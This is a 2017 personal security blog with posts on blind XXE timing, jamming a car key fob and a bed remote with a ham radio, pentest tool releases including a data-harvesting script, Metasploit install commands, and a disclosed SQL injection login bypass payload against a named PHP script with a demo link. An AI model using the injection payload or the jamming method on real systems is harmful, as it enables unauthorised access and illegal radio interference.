Sunday, December 3, 2017

DNS cache snooping via Blind XXE based SSRF?

Is this a thing? You tell me.

Say you have an XXE vuln that lets you make HTTP calls only (SSRF) on a pentest, you know its working only because you see packets over port 80 to a server you control coming from the target system, no data exfil or other fun stuff, so no out put of any kind other then server response times. Not much you can do right? Well while playing around I noticed the response time was long when I looked for domains that don't exist. So I switched to subdomains of good root domains and saw the same delay... That is DNS cache snooping yeah? If so its a newish worthless attack vector kinda I think. At least I have not seen any papers on it so it might be new. What do you think?

Tuesday, October 3, 2017

I be Jahamming - Jamming stuff with a Ham radio

So I have been looking at playing around with the HackRF One for a while and seeing Calebs talk at DEFCON really got me itching to play, but was not quite sure where to start. After googling RF/HackRF,GNURadio 101 for a bit, I figured since I already have a Ham radio sitting around I would start with the frequencies available on my Ham and the stuff in my house. This gave me a something familiar to start with since everything was so new with both the HackRF, the software I needed to operate it "GNURadio", RF it self, etc. Here are just a few notes on my experiences so far..

First a few things to note about the HackRF, it leaks RF all over the spectrum. When I would do a sweep, on the frequencies my Ham could Rx/Tx on and then listen in on my Ham on the IDed frequencies it was nothing of importance. So I started a few very professional trial and error methods "moving around and tapping on the HackRF" and noticed a change in the white noise then when I unplugged it the Tx stopped. Also when you Tx on a frequency that the HackRF ins't already leaking on, then stop the program "GNURadio" the HackRF will continue to transmit on that frequency.

On to Jamming. First thing I wanted to mess with was my car, I don't know much about it but I am guessing it uses a rolling code so therefore replay was out, but jamming would be ok :) After a quick check of its FCC ID I found the frequency. To my surprise it was in the range of my Ham! First thing I did was listen to it on my Ham when I hit the lock button on my fob I could hear little beeps, my car locked and boy was I excited! So then I keyed up my radio and hit the lock button on my fob again, this time nothing!! I stopped Tx on my radio and I could once again lock my car. My Ham Tx was more powerful then the fobs Tx so it was jammed! 

Next up was a motorized bed we got a few years back. It has a remote to control the head, foot, and vibrate functions. It does not have an IR Led so I figured it must be RF. I opened it and there was an FCC ID. Again it was in the range of my radio! After listening to the beeps on my radio and getting a good message, I keyed up my radio and the remote stopped working, lol. 

Thats all I have for now, but there is more to come on this topic! One thing for sure, there are way more commercial products using Ham frequencies then I first originally thought, it should be fun breaking them.  I have had a blast so far and look forward to playing with the HackRF and my Ham more! Might make my own bed remote with a doggy style position/mode or something lol! Happy Hacking.


Monday, September 11, 2017

HaX11 released @ Bsides STL!

Here is a little python script I made to aid in pen-testing X11 configurations on IoT and other systems.  I also gave a talk on this tool and the type of exposure found in the wild at Bsides STL. BSides STL was awesome and I thank everyone involved for the great opportunity! Can't wait until next year.

Get HaX11 @ GitHub

I decided not to share the slides so fuck you for not going to BSides STL :p

Basic usage is "#python hax11.py tar.get.ip.here"
Needs xdotool to work on kali systems.
More on HaX11 usage to come...

Saturday, August 19, 2017

SharePointSpy released!

Q: What is SharePointSpy?

A: Its a small Chrome extension that checks your access to sensitive areas of SharePoint base and sub sites. It also has some pre-configured search terms that can be used on the base and sub sites to look for files that could have sensitive information. The goal was to make SharePoint audits easier form the auditors POV.
###
Q: Why?

A: I wanted the ability to audit SharePoint sites and I originally looked at Bishop Fox's SharePoint Hacking Diggity Project but kept having issues and felt it could work better as a Chrome extension and could have more features. So I set out to mimic Bishop's SharePointURLBrute in Chrome, added a few things and here we are :)
###
Q: Where can I get it?

A: Githug.

It has a few issues and could use a few more features. 302 redirects break SPS, when it encounters a 302 is just hangs. I would like to be able to  scan a site as an anonymous user but I have not figured that one out yet. If you know the secret to either of the above please let me know. That is all I got for now. Happy hacking!

Wednesday, July 26, 2017

Make or Break admin login bypass via SQLi

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: Make or Break
[x] Script Version: 1.7
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
[x] Author: AnarchyAngel AKA Adam
[x] Mail: anarchy[dot]ang31@gmail[dot]com
[x] More info: https://aahideaway.blogspot.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Navigate to scripts admin login page and submit admin' or ''='-- for username
and it should give you access to the admin area. A quick release to kick off the DefCon festivities. See you there!

Enjoy >:)

Demo: http://software.friendsinwar.com/scripts_example/make_or_break/index.php

Wednesday, July 12, 2017

Introducing Booty Quest!

Booty Quest [BQ] is a little bash script I made to aid in my pen testing activities. While running a pen test I often find a large number of anonymous FTP servers, unsecured SMB shares, so on and due to resource restrictions I can't dive any deeper. While these are findings in their own right, it leaves a lot on the bone in my opinion. Finding these services are also hosting sensitive information could turn a medium finding into high or critical depending on the scale you use.

I have seen countless third parties "pen-test vendors" do the same and pass over looking at the data that is being exposed by the service. There are some tools out there with functions that are somewhat similar but nothing that does all the heavy lifting of making connections and managing the data like BQ.

So basically you find a anonymous FTP or SMB server, then you just plug in the IP of the host and in the case of SMB the share path. BQ will download all the files on the FTP server or mount the SMB share and then use grep and regex to locate IPs, emails, CC#s, SS#s, Phone #s, IBAN, usernames, and passwords. If it finds text files and images it will copy them to another location so you can sift over them later.

Basic setup:
After you download the script run:
chmod a+x bq.sh

Here is the basic help:
root@system:~/sec# ./bq.sh 
#######################
# [B]ooty [Q]uest                #
# By Adam Espitia               #
               # aahideaway.blogspot.com #
# Arr, matey,                       #
#  where be me booty!        #
#######################

This script will mount/download contact from a remote host and search it for sensitive information.

Usage here
./bq.sh nfs 192.168.1.1 /share/here/
./bq.sh smb 192.168.1.1 /share/here/
./bq.sh ftp 192.168.1.1
./bq.sh http 192.168.1.1 /dir/path/
./bq.sh local /dir/path/

Friday, June 30, 2017

Installing Metasploit on Debian 9 server

So I recently installed Metasploit on Debian 9, heres how:

apt-get install default-jre default-jdk software-properties-common
add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main"
apt-get update
apt-get install oracle-java8-installer
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev
curl -sSL https://rvm.io/mpapis.asc | gpg --import -
curl -L https://get.rvm.io | bash -s stable
source /usr/local/rvm/scripts/rvm
echo "source /usr/local/rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rvm install $RUBYVERSION
rvm use $RUBYVERSION --default
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
mkdir ~/dev
cd ~/dev
git clone https://github.com/nmap/nmap.git
./configure
make
make install
make clean
su postgres
createuser msf -P -S -R -D
createdb -O msf msf
psql -c "ALTER USER msf WITH ENCRYPTED PASSWORD 'blah';"
exit
cd /opt/
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework/
rvm --default use ruby-${RUBYVERSION}@metasploit-framework
gem install bundler
bundle install
bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
nano /opt/metasploit-framework/config/database.yml
datebase.yml contents
production:
 adapter: postgresql
 database: msf
 username: msf
 password: blah
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5
More cmds...
sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
msfconsole...


Yeah that sucked, but it works!